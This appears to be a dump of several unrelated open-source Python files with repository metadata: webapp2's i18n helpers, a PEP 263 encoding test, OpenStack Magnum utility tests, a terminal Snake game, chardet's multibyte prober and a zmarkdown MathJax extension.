self.tzinfo = pytz.timezone(timezone)
def gettext(self, string, **variables):
"""Translates a given string according to the current locale.
:param string:
The string to be translated.
:param variables:
Variables to format the returned string.
:returns:
The translated string.
"""
if variables:
return self.translations.ugettext(string) % variables
return self.translations.ugettext(string)
def ngettext(self, singular, plural, n, **variables):
"""Translates a possible pluralized string according to the current
locale.
:param singular:
The singular for of the string to be translated.
:param plural:
The plural for of the string to be translated.
:param n:
An integer indicating if this is a singular or plural. If greater
than 1, it is a plural.
:param variables:
Variables to format the returned string.
:returns:
The translated string.
"""
if variables:
return self.translations.ungettext(singular, plural, n) % variables
return self.translations.ungettext(singular, plural, n)
def to_local_timezone(self, datetime):
"""Returns a datetime object converted to the local timezone.
:param datetime:
A ``datetime`` object.
:returns:
A ``datetime`` object normalized to a timezone.
"""
if datetime.tzinfo is None:
datetime = datetime.replace(tzinfo=pytz.UTC)
return self.tzinfo.normalize(datetime.astimezone(self.tzinfo))
def to_utc(self, datetime):
"""Returns a datetime object converted to UTC and without tzinfo.
:param datetime:
A ``datetime`` object.
:returns:
A naive ``datetime`` object (no timezone), converted to UTC.
"""
if datetime.tzinfo is None:
datetime = self.tzinfo.localize(datetime)
return datetime.astimezone(pytz.UTC).replace(tzinfo=None)
def _get_format(self, key, format):
"""A helper for the datetime formatting functions. Returns a format
name or pattern to be used by Babel date format functions.
:param key:
A format key to be get from config. Valid values are "date",
"datetime" or "time".
:param format:
The format to be returned. Valid values are "short", "medium",
"long", "full" or a custom date/time pattern.
:returns:
A format name or pattern to be used by Babel date format functions.
"""
if format is None:
format = self.store.date_formats.get(key)
if format in ('short', 'medium', 'full', 'long', 'iso'):
rv = self.store.date_formats.get('%s.%s' % (key, format))
if rv is not None:
format = rv
return format
def format_date(self, date=None, format=None, rebase=True):
"""Returns a date formatted according to the given pattern and
following the current locale.
:param date:
A ``date`` or ``datetime`` object. If None, the current date in
UTC is used.
:param format:
The format to be returned. Valid values are "short", "medium",
"long", "full" or a custom date/time pattern. Example outputs:
- short: 11/10/09
- medium: Nov 10, 2009
- long: November 10, 2009
- full: Tuesday, November 10, 2009
:param rebase:
If True, converts the date to the current :attr:`timezone`.
:returns:
A formatted date in unicode.
"""
format = self._get_format('date', format)
if rebase and isinstance(date, datetime.datetime):
date = self.to_local_timezone(date)
return dates.format_date(date, format, locale=self.locale)
def format_datetime(self, datetime=None, format=None, rebase=True):
"""Returns a date and time formatted according to the given pattern
and following the current locale and timezone.
:param datetime:
A ``datetime`` object. If None, the current date and time in UTC
is used.
:param format:
The format to be returned. Valid values are "short", "medium",
"long", "full" or a custom date/time pattern. Example outputs:
- short: 11/10/09 4:36 PM
- medium: Nov 10, 2009 4:36:05 PM
- long: November 10, 2009 4:36:05 PM +0000
- full: Tuesday, November 10, 2009 4:36:05 PM World (GMT) Time
:param rebase:
If True, converts the datetime to the current :attr:`timezone`.
:returns:
A formatted date and time in unicode.
"""
format = self._get_format('datetime', format)
kwargs = {}
if rebase:
kwargs['tzinfo'] = self.tzinfo
return dates.format_datetime(datetime, format, locale=self.locale,
**kwargs)
def format_time(self, time=None, format=None, rebase=True):
"""Returns a time formatted according to the given pattern and
following the current locale and timezone.
:param time:
A ``time`` or ``datetime`` object. If None, the current
time in UTC is used.
:param format:
The format to be returned. Valid values are "short", "medium",
"long", "full" or a custom date/time pattern. Example outputs:
- short: 4:36 PM
- medium: 4:36:05 PM
- long: 4:36:05 PM +0000
- full: 4:36:05 PM World (GMT) Time
:param rebase:
If True, converts the time to the current :attr:`timezone`.
:returns:
A formatted time in unicode.
"""
format = self._get_format('time', format)
kwargs = {}
if rebase:
kwargs['tzinfo'] = self.tzinfo
return dates.format_time(time, format, locale=self.locale, **kwargs)
def format_timedelta(self, datetime_or_timedelta, granularity='second',
threshold=.85):
"""Formats the elapsed time from the given date to now or the given
timedelta. This currently requires an unreleased development version
of Babel.
:param datetime_or_timedelta:
A ``timedelta`` object representing the time difference to format,
or a ``datetime`` object in UTC.
:param granularity:
Determines the smallest unit that should be displayed, the value
can be one of "year", "month", "week", "day", "hour", "minute" or
"second".
:param threshold:
Factor that determines at which point the presentation switches to
the next higher unit.
:returns:
A string with the elapsed time.
"""
if isinstance(datetime_or_timedelta, datetime.datetime):
datetime_or_timedelta = datetime.datetime.utcnow() - \
datetime_or_timedelta
return dates.format_timedelta(datetime_or_timedelta, granularity,
threshold=threshold,
locale=self.locale)
def format_number(self, number):
"""Returns the given number formatted for the current locale. Example::
>>> format_number(1099, locale='en_US')
u'1,099'
:param number:
The number to format.
:returns:
The formatted number.
"""
return numbers.format_number(number, locale=self.locale)
def format_decimal(self, number, format=None):
"""Returns the given decimal number formatted for the current locale.
Example::
>>> format_decimal(1.2345, locale='en_US')
u'1.234'
>>> format_decimal(1.2346, locale='en_US')
u'1.235'
>>> format_decimal(-1.2346, locale='en_US')
u'-1.235'
>>> format_decimal(1.2345, locale='sv_SE')
u'1,234'
>>> format_decimal(12345, locale='de')
u'12.345'
The appropriate thousands grouping and the decimal separator are used
for each locale::
>>> format_decimal(12345.5, locale='en_US')
u'12,345.5'
:param number:
The number to format.
:param format:
Notation format.
:returns:
The formatted decimal number.
"""
return numbers.format_decimal(number, format=format,
locale=self.locale)
def format_currency(self, number, currency, format=None):
"""Returns a formatted currency value. Example::
>>> format_currency(1099.98, 'USD', locale='en_US')
u'$1,099.98'
>>> format_currency(1099.98, 'USD', locale='es_CO')
u'US$\\xa01.099,98'
>>> format_currency(1099.98, 'EUR', locale='de_DE')
u'1.099,98\\xa0\\u20ac'
The pattern can also be specified explicitly::
>>> format_currency(1099.98, 'EUR', u'\\xa4\\xa4 #,##0.00',
... locale='en_US')
u'EUR 1,099.98'
:param number:
The number to format.
:param currency:
The currency code.
:param format:
Notation format.
:returns:
The formatted currency value.
"""
return numbers.format_currency(number, currency, format=format,
locale=self.locale)
def format_percent(self, number, format=None):
"""Returns formatted percent value for the current locale. Example::
>>> format_percent(0.34, locale='en_US')
u'34%'
>>> format_percent(25.1234, locale='en_US')
u'2,512%'
>>> format_percent(25.1234, locale='sv_SE')
u'2\\xa0512\\xa0%'
The format pattern can also be specified explicitly::
>>> format_percent(25.1234, u'#,##0\u2030', locale='en_US')
u'25,123\u2030'
:param number:
The percent number to format
:param format:
Notation format.
:returns:
The formatted percent number.
"""
return numbers.format_percent(number, format=format,
locale=self.locale)
def format_scientific(self, number, format=None):
"""Returns value formatted in scientific notation for the current
locale. Example::
>>> format_scientific(10000, locale='en_US')
u'1E4'
The format pattern can also be specified explicitly::
>>> format_scientific(1234567, u'##0E00', locale='en_US')
u'1.23E06'
:param number:
The number to format.
:param format:
Notation format.
:returns:
Value formatted in scientific notation.
"""
return numbers.format_scientific(number, format=format,
locale=self.locale)
def parse_date(self, string):
"""Parses a date from a string.
This function uses the date format for the locale as a hint to
determine the order in which the date fields appear in the string.
Example::
>>> parse_date('4/1/04', locale='en_US')
datetime.date(2004, 4, 1)
>>> parse_date('01.04.2004', locale='de_DE')
datetime.date(2004, 4, 1)
:param string:
The string containing the date.
:returns:
The parsed date object.
"""
return dates.parse_date(string, locale=self.locale)
def parse_datetime(self, string):
"""Parses a date and time from a string.
This function uses the date and time formats for the locale as a hint
to determine the order in which the time fields appear in the string.
:param string:
The string containing the date and time.
:returns:
The parsed datetime object.
"""
return dates.parse_datetime(string, locale=self.locale)
def parse_time(self, string):
"""Parses a time from a string.
This function uses the time format for the locale as a hint to
determine the order in which the time fields appear in the string.
Example::
>>> parse_time('15:30:00', locale='en_US')
datetime.time(15, 30)
:param string:
The string containing the time.
:returns:
The parsed time object.
"""
return dates.parse_time(string, locale=self.locale)
def parse_number(self, string):
"""Parses localized number string into a long integer. Example::
>>> parse_number('1,099', locale='en_US')
1099L
>>> parse_number('1.099', locale='de_DE')
1099L
When the given string cannot be parsed, an exception is raised::
>>> parse_number('1.099,98', locale='de')
Traceback (most recent call last):
...
NumberFormatError: '1.099,98' is not a valid number
:param string:
The string to parse.
:returns:
The parsed number.
:raises:
``NumberFormatError`` if the string can not be converted to a
number.
"""
return numbers.parse_number(string, locale=self.locale)
def parse_decimal(self, string):
"""Parses localized decimal string into a float. Example::
>>> parse_decimal('1,099.98', locale='en_US')
1099.98
>>> parse_decimal('1.099,98', locale='de')
1099.98
When the given string cannot be parsed, an exception is raised::
>>> parse_decimal('2,109,998', locale='de')
Traceback (most recent call last):
...
NumberFormatError: '2,109,998' is not a valid decimal number
:param string:
The string to parse.
:returns:
The parsed decimal number.
:raises:
``NumberFormatError`` if the string can not be converted to a
decimal number.
"""
return numbers.parse_decimal(string, locale=self.locale)
def get_timezone_location(self, dt_or_tzinfo):
"""Returns a representation of the given timezone using "location
format".
The result depends on both the local display name of the country and
the city assocaited with the time zone::
>>> from pytz import timezone
>>> tz = timezone('America/St_Johns')
>>> get_timezone_location(tz, locale='de_DE')
u"Kanada (St. John's)"
>>> tz = timezone('America/Mexico_City')
>>> get_timezone_location(tz, locale='de_DE')
u'Mexiko (Mexiko-Stadt)'
If the timezone is associated with a country that uses only a single
timezone, just the localized country name is returned::
>>> tz = timezone('Europe/Berlin')
>>> get_timezone_name(tz, locale='de_DE')
u'Deutschland'
:param dt_or_tzinfo:
The ``datetime`` or ``tzinfo`` object that determines
the timezone; if None, the current date and time in UTC is assumed.
:returns:
The localized timezone name using location format.
"""
return dates.get_timezone_name(dt_or_tzinfo, locale=self.locale)
def gettext(string, **variables):
"""See :meth:`I18n.gettext`."""
return get_i18n().gettext(string, **variables)
def ngettext(singular, plural, n, **variables):
"""See :meth:`I18n.ngettext`."""
return get_i18n().ngettext(singular, plural, n, **variables)
def to_local_timezone(datetime):
"""See :meth:`I18n.to_local_timezone`."""
return get_i18n().to_local_timezone(datetime)
def to_utc(datetime):
"""See :meth:`I18n.to_utc`."""
return get_i18n().to_utc(datetime)
def format_date(date=None, format=None, rebase=True):
"""See :meth:`I18n.format_date`."""
return get_i18n().format_date(date, format, rebase)
def format_datetime(datetime=None, format=None, rebase=True):
"""See :meth:`I18n.format_datetime`."""
return get_i18n().format_datetime(datetime, format, rebase)
def format_time(time=None, format=None, rebase=True):
"""See :meth:`I18n.format_time`."""
return get_i18n().format_time(time, format, rebase)
def format_timedelta(datetime_or_timedelta, granularity='second',
threshold=.85):
"""See :meth:`I18n.format_timedelta`."""
return get_i18n().format_timedelta(datetime_or_timedelta,
granularity, threshold)
def format_number(number):
"""See :meth:`I18n.format_number`."""
return get_i18n().format_number(number)
def format_decimal(number, format=None):
"""See :meth:`I18n.format_decimal`."""
return get_i18n().format_decimal(number, format)
def format_currency(number, currency, format=None):
"""See :meth:`I18n.format_currency`."""
return get_i18n().format_currency(number, currency, format)
def format_percent(number, format=None):
"""See :meth:`I18n.format_percent`."""
return get_i18n().format_percent(number, format)
def format_scientific(number, format=None):
"""See :meth:`I18n.format_scientific`."""
return get_i18n().format_scientific(number, format)
def parse_date(string):
"""See :meth:`I18n.parse_date`"""
return get_i18n().parse_date(string)
def parse_datetime(string):
"""See :meth:`I18n.parse_datetime`."""
return get_i18n().parse_datetime(string)
def parse_time(string):
"""See :meth:`I18n.parse_time`."""
return get_i18n().parse_time(string)
def parse_number(string):
"""See :meth:`I18n.parse_number`."""
return get_i18n().parse_number(string)
def parse_decimal(string):
"""See :meth:`I18n.parse_decimal`."""
return get_i18n().parse_decimal(string)
def get_timezone_location(dt_or_tzinfo):
"""See :meth:`I18n.get_timezone_location`."""
return get_i18n().get_timezone_location(dt_or_tzinfo)
def lazy_gettext(string, **variables):
"""A lazy version of :func:`gettext`.
:param string:
The string to be translated.
:param variables:
Variables to format the returned string.
:returns:
A ``babel.support.LazyProxy`` object that when accessed translates
the string.
"""
return support.LazyProxy(gettext, string, **variables)
# Aliases.
_ = gettext
_lazy = lazy_gettext
# Factories -------------------------------------------------------------------
#: Key used to store :class:`I18nStore` in the app registry.
_store_registry_key = 'webapp2_extras.i18n.I18nStore'
#: Key used to store :class:`I18n` in the request registry.
_i18n_registry_key = 'webapp2_extras.i18n.I18n'
def get_store(factory=I18nStore, key=_store_registry_key, app=None):
"""Returns an instance of :class:`I18nStore` from the app registry.
It'll try to get it from the current app registry, and if it is not
registered it'll be instantiated and registered. A second call to this
function will return the same instance.
:param factory:
The callable used to build and register the instance if it is not yet
registered. The default is the class :class:`I18nStore` itself.
:param key:
The key used to store the instance in the registry. A default is used
if it is not set.
:param app:
A :class:`webapp2.WSGIApplication` instance used to store the instance.
The active app is used if it is not set.
"""
app = app or webapp2.get_app()
store = app.registry.get(key)
if not store:
store = app.registry[key] = factory(app)
return store
def set_store(store, key=_store_registry_key, app=None):
"""Sets an instance of :class:`I18nStore` in the app registry.
:param store:
An instance of :class:`I18nStore`.
:param key:
The key used to retrieve the instance from the registry. A default
is used if it is not set.
:param request:
A :class:`webapp2.WSGIApplication` instance used to retrieve the
instance. The active app is used if it is not set.
"""
app = app or webapp2.get_app()
app.registry[key] = store
def get_i18n(factory=I18n, key=_i18n_registry_key, request=None):
"""Returns an instance of :class:`I18n` from the request registry.
It'll try to get it from the current request registry, and if it is not
registered it'll be instantiated and registered. A second call to this
function will return the same instance.
:param factory:
The callable used to build and register the instance if it is not yet
registered. The default is the class :class:`I18n` itself.
:param key:
The key used to store the instance in the registry. A default is used
if it is not set.
:param request:
A :class:`webapp2.Request` instance used to store the instance. The
active request is used if it is not set.
"""
request = request or webapp2.get_request()
i18n = request.registry.get(key)
if not i18n:
i18n = request.registry[key] = factory(request)
return i18n
def set_i18n(i18n, key=_i18n_registry_key, request=None):
"""Sets an instance of :class:`I18n` in the request registry.
:param store:
An instance of :class:`I18n`.
:param key:
The key used to retrieve the instance from the registry. A default
is used if it is not set.
:param request:
A :class:`webapp2.Request` instance used to retrieve the instance. The
active request is used if it is not set.
"""
request = request or webapp2.get_request()
request.registry[key] = i18n
| mit |
ojii/sandlib | lib/lib-python/2.7/test/test_pep263.py | 85 | 1370 | # -*- coding: koi8-r -*-
import unittest
from test import test_support
class PEP263Test(unittest.TestCase):
def test_pep263(self):
self.assertEqual(
u"ðÉÔÏÎ".encode("utf-8"),
'\xd0\x9f\xd0\xb8\xd1\x82\xd0\xbe\xd0\xbd'
)
self.assertEqual(
u"\ð".encode("utf-8"),
'\\\xd0\x9f'
)
def test_compilestring(self):
# see #1882
c = compile("\n# coding: utf-8\nu = u'\xc3\xb3'\n", "dummy", "exec")
d = {}
exec c in d
self.assertEqual(d['u'], u'\xf3')
def test_issue3297(self):
c = compile("a, b = '\U0001010F', '\\U0001010F'", "dummy", "exec")
d = {}
exec(c, d)
self.assertEqual(d['a'], d['b'])
self.assertEqual(len(d['a']), len(d['b']))
def test_issue7820(self):
# Ensure that check_bom() restores all bytes in the right order if
# check_bom() fails in pydebug mode: a buffer starts with the first
# byte of a valid BOM, but next bytes are different
# one byte in common with the UTF-16-LE BOM
self.assertRaises(SyntaxError, eval, '\xff\x20')
# two bytes in common with the UTF-8 BOM
self.assertRaises(SyntaxError, eval, '\xef\xbb\x20')
def test_main():
test_support.run_unittest(PEP263Test)
if __name__=="__main__":
test_main()
| bsd-3-clause |
openstack/magnum | magnum/tests/unit/common/test_utils.py | 2 | 11275 | # Copyright 2011 Justin Santa Barbara
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import os
import os.path
import shutil
import tempfile
from unittest import mock
from oslo_concurrency import processutils
from oslo_utils import netutils
from magnum.common import exception
from magnum.common import utils
import magnum.conf
from magnum.tests import base
CONF = magnum.conf.CONF
class UtilsTestCase(base.TestCase):
def test_get_k8s_quantity(self):
self.assertEqual(1024000.0, utils.get_k8s_quantity('1000Ki'))
self.assertEqual(0.001, utils.get_k8s_quantity('1E-3'))
self.assertEqual(0.5, utils.get_k8s_quantity('0.0005k'))
self.assertEqual(0.5, utils.get_k8s_quantity('500m'))
self.assertEqual(1300000.0, utils.get_k8s_quantity('1.3E+6'))
self.assertEqual(1300000.0, utils.get_k8s_quantity('1.3E6'))
self.assertRaises(exception.UnsupportedK8sQuantityFormat,
utils.get_k8s_quantity, '1E1E')
def test_get_docker_quantity(self):
self.assertEqual(512, utils.get_docker_quantity('512'))
self.assertEqual(512, utils.get_docker_quantity('512b'))
self.assertEqual(512 * 1024, utils.get_docker_quantity('512k'))
self.assertEqual(512 * 1024 * 1024, utils.get_docker_quantity('512m'))
self.assertEqual(512 * 1024 * 1024 * 1024,
utils.get_docker_quantity('512g'))
self.assertRaises(exception.UnsupportedDockerQuantityFormat,
utils.get_docker_quantity, '512bb')
self.assertRaises(exception.UnsupportedDockerQuantityFormat,
utils.get_docker_quantity, '512B')
def test_get_openstasck_ca(self):
# openstack_ca_file is empty
self.assertEqual('', utils.get_openstack_ca())
# openstack_ca_file is set but the file doesn't exist
CONF.set_override('openstack_ca_file',
'/tmp/invalid-ca.pem',
group='drivers')
self.assertRaises(IOError, utils.get_openstack_ca)
# openstack_ca_file is set and the file exists
CONF.set_override('openstack_ca_file',
'/tmp/invalid-ca.pem',
group='drivers')
with mock.patch('magnum.common.utils.open',
mock.mock_open(read_data="CERT"), create=True):
self.assertEqual('CERT', utils.get_openstack_ca())
class ExecuteTestCase(base.TestCase):
def test_retry_on_failure(self):
fd, tmpfilename = tempfile.mkstemp()
_, tmpfilename2 = tempfile.mkstemp()
try:
fp = os.fdopen(fd, 'w+')
fp.write('''#!/bin/sh
# If stdin fails to get passed during one of the runs, make a note.
if ! grep -q foo
then
echo 'failure' > "$1"
fi
# If stdin has failed to get passed during this or a previous run, exit early.
if grep failure "$1"
then
exit 1
fi
runs="$(cat $1)"
if [ -z "$runs" ]
then
runs=0
fi
runs=$(($runs + 1))
echo $runs > "$1"
exit 1
''')
fp.close()
os.chmod(tmpfilename, 0o755)
try:
self.assertRaises(processutils.ProcessExecutionError,
utils.execute,
tmpfilename, tmpfilename2, attempts=10,
process_input=b'foo',
delay_on_retry=False)
except OSError as e:
if e.errno == errno.EACCES:
self.skipTest("Permissions error detected. "
"Are you running with a noexec /tmp?")
else:
raise
with open(tmpfilename2, 'r') as fp:
runs = fp.read()
self.assertNotEqual(runs.strip(), 'failure', 'stdin did not '
'always get passed '
'correctly')
runs = int(runs.strip())
self.assertEqual(10, runs,
'Ran %d times instead of 10.' % runs)
finally:
os.unlink(tmpfilename)
os.unlink(tmpfilename2)
def test_unknown_kwargs_raises_error(self):
self.assertRaises(processutils.UnknownArgumentError,
utils.execute,
'/usr/bin/env', 'true',
this_is_not_a_valid_kwarg=True)
def test_check_exit_code_boolean(self):
utils.execute('/usr/bin/env', 'false', check_exit_code=False)
self.assertRaises(processutils.ProcessExecutionError,
utils.execute,
'/usr/bin/env', 'false', check_exit_code=True)
def test_no_retry_on_success(self):
fd, tmpfilename = tempfile.mkstemp()
_, tmpfilename2 = tempfile.mkstemp()
try:
fp = os.fdopen(fd, 'w+')
fp.write('''#!/bin/sh
# If we've already run, bail out.
grep -q foo "$1" && exit 1
# Mark that we've run before.
echo foo > "$1"
# Check that stdin gets passed correctly.
grep foo
''')
fp.close()
os.chmod(tmpfilename, 0o755)
try:
utils.execute(tmpfilename,
tmpfilename2,
process_input=b'foo',
attempts=2)
except OSError as e:
if e.errno == errno.EACCES:
self.skipTest("Permissions error detected. "
"Are you running with a noexec /tmp?")
else:
raise
finally:
os.unlink(tmpfilename)
os.unlink(tmpfilename2)
@mock.patch.object(processutils, 'execute')
@mock.patch.object(os.environ, 'copy', return_value={})
def test_execute_use_standard_locale_no_env_variables(self, env_mock,
execute_mock):
utils.execute('foo', use_standard_locale=True)
execute_mock.assert_called_once_with('foo',
env_variables={'LC_ALL': 'C'})
@mock.patch.object(processutils, 'execute')
def test_execute_use_standard_locale_with_env_variables(self,
execute_mock):
utils.execute('foo', use_standard_locale=True,
env_variables={'foo': 'bar'})
execute_mock.assert_called_once_with('foo',
env_variables={'LC_ALL': 'C',
'foo': 'bar'})
@mock.patch.object(processutils, 'execute')
def test_execute_not_use_standard_locale(self, execute_mock):
utils.execute('foo', use_standard_locale=False,
env_variables={'foo': 'bar'})
execute_mock.assert_called_once_with('foo',
env_variables={'foo': 'bar'})
def test_execute_get_root_helper(self):
with mock.patch.object(processutils, 'execute') as execute_mock:
helper = utils._get_root_helper()
utils.execute('foo', run_as_root=True)
execute_mock.assert_called_once_with('foo', run_as_root=True,
root_helper=helper)
def test_execute_without_root_helper(self):
with mock.patch.object(processutils, 'execute') as execute_mock:
utils.execute('foo', run_as_root=False)
execute_mock.assert_called_once_with('foo', run_as_root=False)
def test_validate_and_normalize_mac(self):
mac = 'AA:BB:CC:DD:EE:FF'
with mock.patch.object(netutils, 'is_valid_mac') as m_mock:
m_mock.return_value = True
self.assertEqual(mac.lower(),
utils.validate_and_normalize_mac(mac))
def test_validate_and_normalize_mac_invalid_format(self):
with mock.patch.object(netutils, 'is_valid_mac') as m_mock:
m_mock.return_value = False
self.assertRaises(exception.InvalidMAC,
utils.validate_and_normalize_mac, 'invalid-mac')
def test_safe_rstrip(self):
value = '/test/'
rstripped_value = '/test'
not_rstripped = '/'
self.assertEqual(rstripped_value, utils.safe_rstrip(value, '/'))
self.assertEqual(not_rstripped, utils.safe_rstrip(not_rstripped, '/'))
def test_safe_rstrip_not_raises_exceptions(self):
# Supplying an integer should normally raise an exception because it
# does not save the rstrip() method.
value = 10
# In the case of raising an exception safe_rstrip() should return the
# original value.
self.assertEqual(value, utils.safe_rstrip(value))
class TempFilesTestCase(base.TestCase):
def test_tempdir(self):
dirname = None
with utils.tempdir() as tempdir:
self.assertTrue(os.path.isdir(tempdir))
dirname = tempdir
self.assertFalse(os.path.exists(dirname))
@mock.patch.object(shutil, 'rmtree')
@mock.patch.object(tempfile, 'mkdtemp')
def test_tempdir_mocked(self, mkdtemp_mock, rmtree_mock):
self.config(tempdir='abc')
mkdtemp_mock.return_value = 'temp-dir'
kwargs = {'a': 'b'}
with utils.tempdir(**kwargs) as tempdir:
self.assertEqual('temp-dir', tempdir)
tempdir_created = tempdir
mkdtemp_mock.assert_called_once_with(**kwargs)
rmtree_mock.assert_called_once_with(tempdir_created)
@mock.patch.object(utils, 'LOG')
@mock.patch.object(shutil, 'rmtree')
@mock.patch.object(tempfile, 'mkdtemp')
def test_tempdir_mocked_error_on_rmtree(self, mkdtemp_mock, rmtree_mock,
log_mock):
self.config(tempdir='abc')
mkdtemp_mock.return_value = 'temp-dir'
rmtree_mock.side_effect = OSError
with utils.tempdir() as tempdir:
self.assertEqual('temp-dir', tempdir)
tempdir_created = tempdir
rmtree_mock.assert_called_once_with(tempdir_created)
self.assertTrue(log_mock.error.called)
class GeneratePasswordTestCase(base.TestCase):
def test_generate_password(self):
password = utils.generate_password(length=12)
self.assertTrue([c for c in password if c in '0123456789'])
self.assertTrue([c for c in password
if c in 'abcdefghijklmnopqrstuvwxyz'])
self.assertTrue([c for c in password
if c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'])
| apache-2.0 |
5paceManSpiff/CLSnake | src/main.py | 1 | 2890 | #!/usr/bin/env python3
import curwrap
import curses
import snake
import time
import os
import sys
# initializes the curses standard screen
stdscr = curses.initscr()
def restart_snake():
"""Restarts the CLSnake process."""
# exits curses loop
curwrap.endC(stdscr)
# executes CLSnake
python = sys.executable
os.execl(python, python, * sys.argv)
# end of program
def main():
"""Contains the main loop and game logic."""
# holds score
score = 0
# holds dimensions of terminal window
y, x = stdscr.getmaxyx()
#defines the main, stats, and board windows
main = curses.newwin(y-1, x, 0, 0)
stat = curses.newwin(1, x, y-1, 1)
board = curses.newwin(y-3, x-3, 1, 1)
# holds dimensions for the board window
boardy, boardx = board.getmaxyx()
# sets s as the "Snake" object from the snake module
s = snake.Snake(board)
#sets the direction that the snake initially moves in
facing = 'r'
# prevents curses from waiting for character inputs
stdscr.nodelay(1)
# initializes first food object
foo = snake.Food(10, 10, y - 3, boardx, board)
grow = False
# main loop
while True:
# increases (arbitrary) game speed based on score
if score == 0:
time.sleep(.1)
else:
time.sleep(.05 / score * 2)
# adds score if player eats food
if s.parts[0].x == foo.x and s.parts[0].y == foo.y:
score += 1
foo.new()
grow = True
# adds snake parts depending on direction
for i in range(y-1): #left
main.addstr(i, 0, ' ', curses.A_REVERSE)
for i in range(y-1): #right
main.addstr(i, x-2, ' ', curses.A_REVERSE)
for i in range(x-1): #top
main.addstr(0, i, ' ', curses.A_REVERSE)
for i in range(x-1): #bottom
main.addstr(y-2, i, ' ', curses.A_REVERSE)
# displays score
stat.addstr(0, 0, 'Score : ' + str(score))
# gets pressed character
c = stdscr.getch()
# assigns wasd keys to directions
if c == ord('s'):
direction = 'd'
elif c == ord('w'):
direction = 'u'
elif c == ord('d'):
direction = 'r'
elif c == ord('a'):
direction = 'l'
else:
direction = None
# quits on press of "q" key
if c == ord('q'):
break
# displays food
foo.display()
# moves snake based off of direction facing and new direction
facing = s.move(facing, direction)
# deletes leftover snake parts if not growing
if not grow:
s.delete()
else:
grow = False
# sets world boundaries
if s.parts[0].x == -1 or s.parts[0].x == boardx or s.parts[0].y == -1 or s.parts[0].y == boardy:
restart_snake()
else:
s.display()
# refreshes all displays
main.refresh()
stat.refresh()
board.refresh()
# resets to normal character delay
stdscr.nodelay(0)
# attempts to initialize curses, then start main loop
# if an error occurs, it exits curses as to prevent the terminal from flipping out
try:
curwrap.startC(stdscr)
main()
curwrap.endC(stdscr)
except:
curwrap.endC(stdscr)
raise | mit |
prashanthr/wakatime | wakatime/packages/requests/packages/chardet/mbcharsetprober.py | 2924 | 3268 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
| bsd-3-clause |
zestedesavoir/Python-ZMarkdown | zmarkdown/extensions/mathjax.py | 1 | 1701 | import zmarkdown
from zmarkdown import inlinepatterns, util, Extension
from zmarkdown.blockprocessors import BlockProcessor
import re
class MathJaxPattern(inlinepatterns.Pattern):
def __init__(self):
inlinepatterns.Pattern.__init__(self, r'(?<!\\)\$([^\n]+?)(?<!\\)\$')
def handleMatch(self, m):
node = util.etree.Element('span')
node.text = util.AtomicString("$" + m.group(2) + "$")
return node
class MathJaxBlock(BlockProcessor):
def __init__(self, parser):
BlockProcessor.__init__(self, parser)
self.re = re.compile(r'(?:^|\n)\$\$.+\$\$(\n|$)', re.DOTALL | re.MULTILINE | re.UNICODE)
def test(self, parent, block):
return self.re.search(block)
def run(self, parent, blocks):
block = blocks.pop(0)
m = self.re.search(block)
before = block[:m.start()]
after = block[m.end():]
block = block[m.start():m.end()]
if before:
self.parser.parseBlocks(parent, [before])
dnode = util.etree.SubElement(parent, 'div')
dnode.set('class', "mathjax-wrapper")
node = zmarkdown.util.etree.SubElement(dnode, "mathjax")
node.text = zmarkdown.util.AtomicString(block.strip())
if after:
blocks.insert(0, after)
class MathJaxExtension(Extension):
def extendZMarkdown(self, md, md_globals):
# Needs to come before escape matching because \ is pretty important in LaTeX
md.inlinePatterns.add('mathjax', MathJaxPattern(), '<escape')
md.parser.blockprocessors.add('mathjax', MathJaxBlock(md.parser), '>reference')
def makeExtension(*args, **kwargs):
return MathJaxExtension(*args, **kwargs)
| bsd-3-clause |
datenbetrieb/odoo | addons/base_report_designer/plugin/openerp_report_designer/bin/script/modify.py | 384 | 4437 | #########################################################################
